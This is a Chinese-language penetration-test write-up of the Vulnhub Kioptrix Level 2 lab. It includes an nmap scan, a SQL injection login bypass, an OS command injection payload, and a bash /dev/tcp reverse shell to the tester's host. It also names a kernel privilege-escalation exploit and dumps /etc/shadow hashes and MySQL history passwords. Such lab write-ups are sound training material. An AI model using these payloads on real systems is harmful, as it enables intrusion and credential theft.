OSCP:Vulnhub Kioptrix Level 2 Writeup

0x00 前言

这篇文章的靶机环境为：Kioptrix: Level 1.1 (#2)

0x01 渗透思路

扫描端口，发现Web应用，SQL Injection，OS Command Injection，反弹shell，内核漏洞提权，get root!

0x02 用到的工具

Tools

netdiscover
nmap
nc

exploits

• Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - ‘ip_append_data()’ Ring0 Privilege Escalation (1)

0x03 渗透过程

靶机运行起来大概长这样：

Enumeration

netdiscover 做内网主机发现：

netdiscover -i eth0

Currently scanning: 172.16.179.0/16   |   Screen View: Unique Hosts            
                                                                               
10 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 600               
_____________________________________________________________________________
  IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
-----------------------------------------------------------------------------
192.168.199.1   d4:ee:07:59:a6:ec      6     360  HIWIFI Co., Ltd.             
192.168.199.126 90:f0:52:68:7a:ac      1      60  MEIZU Technology Co., Ltd.   
192.168.199.219 98:22:ef:fc:5c:13      1      60  Liteon Technology Corporation
192.168.199.170 00:0c:29:53:19:4c      2     120  VMware, Inc.

192.168.199.170就是我们的靶机IP了。

nmap全端口扫描走一波：

nmap -p- -sV -T4 -A -Pn -oX Kioptrix_level_2.xml 192.168.199.170

root@kali:~# nmap -p- -sV -T4 -A -Pn -oX Kioptrix_level_2.xml 192.168.199.170
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-13 22:30 EDT
Nmap scan report for 192.168.199.170
Host is up (0.0013s latency).
Not shown: 65528 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey: 
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http       Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind    2 (RPC #100000)
443/tcp  open  ssl/https?
|_ssl-date: 2019-10-13T23:22:09+00:00; -3h09m43s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|_    SSL2_DES_64_CBC_WITH_MD5
631/tcp  open  ipp        CUPS 1.1
| http-methods: 
|_  Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
673/tcp  open  status     1 (RPC #100024)
3306/tcp open  mysql      MySQL (unauthorized)
MAC Address: 00:0C:29:53:19:4C (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop

Host script results:
|_clock-skew: -3h09m43s

TRACEROUTE
HOP RTT     ADDRESS
1   1.26 ms 192.168.199.170

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 114.78 seconds
root@kali:~#

Web APP SQL Injection and OS Command Injection

看着就像SQL Injection，试一下果然有，可以直接注入进后台：

admin' or '1'='1

看着就像是一个OS Command Injection，试一下果然有，大雾。。

192.168.199.1 | cat /etc/passwd

反弹shell过来：

192.168.199.1 | bash -i >& /dev/tcp/192.168.199.166/443 0>&1

基于kernel版本找对应的exploit：

searchsploit linux kernel 2.6

用这个本地提权的exploit：Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - ‘ip_append_data()’ Ring0 Privilege Escalation (1)

去/tmp目录下，有写文件的权限

拿到root权限了

信息收集：

sh-3.00# find / -name '.mysql_history'
/root/.mysql_history
/home/john/.mysql_history
sh-3.00# cat /root/.mysql_history
show databases;
create database webapp;
use webapp;
create table users(id INT,username varchar(100),password varchar(10));
show database;
select * from users;
show databases;
use webapp;
insert into users values(1,'admin','hello');
select * from users;
use mysql
show databases;
use mysql;
select * from users where user=john;
show tables;
select * from user where user=john;
select * from user where user='john';
select * from user;
create user 'john'@'localhost' identified by 'hiroshima';
create user 'webapp'@'localhost' identified by 'hiroshima';
create user 'webapp'@'localhost' IDENTIFIED BY 'hiroshima';
CREATE USER 'webapp'@'localhost' identified by 'hiroshima';
update user set password = password('hiroshima') where user = 'john';
use mysql;
show users;
select * from user;
create user 'john'@'localhost' identified by 'hiroshima';
version;
-v
;
help
flush privileges;
show databases;
use mysql;
grant select,insert,update,delete on *.* to 'john'@'localhost';
update user set password = password('hiroshima') where user = 'john';
flush priveleges;
use webapp;
show tables;
update user set password = password('Ha56!blaKAbl') where user = 'admin';
update username set password = password('Ha56!blaKAbl') where user = 'admin';
select * from users;
update username set password = password('Ha56!blaKAbl') where username = 'admin';
update users set password = password('Ha56!blaKAbl') where username = 'admin';
select * from users;
insert into users values(2,'john','66lajGGbla');
select * from users;
sh-3.00# cat /home/john/.mysql_history
show databases;
sh-3.00#

sh-3.00# cat /etc/shadow
root:$1$FTpMLT88$VdzDQTTcksukSKMLRSVlc.:14529:0:99999:7:::
bin:*:14525:0:99999:7:::
daemon:*:14525:0:99999:7:::
adm:*:14525:0:99999:7:::
lp:*:14525:0:99999:7:::
sync:*:14525:0:99999:7:::
shutdown:*:14525:0:99999:7:::
halt:*:14525:0:99999:7:::
mail:*:14525:0:99999:7:::
news:*:14525:0:99999:7:::
uucp:*:14525:0:99999:7:::
operator:*:14525:0:99999:7:::
games:*:14525:0:99999:7:::
gopher:*:14525:0:99999:7:::
ftp:*:14525:0:99999:7:::
nobody:*:14525:0:99999:7:::
dbus:!!:14525:0:99999:7:::
vcsa:!!:14525:0:99999:7:::
rpm:!!:14525:0:99999:7:::
haldaemon:!!:14525:0:99999:7:::
netdump:!!:14525:0:99999:7:::
nscd:!!:14525:0:99999:7:::
sshd:!!:14525:0:99999:7:::
rpc:!!:14525:0:99999:7:::
mailnull:!!:14525:0:99999:7:::
smmsp:!!:14525:0:99999:7:::
rpcuser:!!:14525:0:99999:7:::
nfsnobody:!!:14525:0:99999:7:::
pcap:!!:14525:0:99999:7:::
apache:!!:14525:0:99999:7:::
squid:!!:14525:0:99999:7:::
webalizer:!!:14525:0:99999:7:::
xfs:!!:14525:0:99999:7:::
ntp:!!:14525:0:99999:7:::
pegasus:!!:14525:0:99999:7:::
mysql:!!:14525::::::
john:$1$wk7kHI5I$2kNTw6ncQQCecJ.5b8xTL1:14525:0:99999:7:::
harold:$1$7d.sVxgm$3MYWsHDv0F/LP.mjL9lp/1:14529:0:99999:7:::
sh-3.00#

0x04 待解决的问题

• 基于kernel版本号自动化找到可以利用的exploit
• “Text flag”没翻到，找了几个之前的writeup也没说到这个

0x05 后记

做Web渗透的，这种属于送分题了，没啥说的。

0x06 参考链接

• Kioptrix - Level 2 (Injection)
• Vulnhub – Kioptrix: Level 1.1 (#2)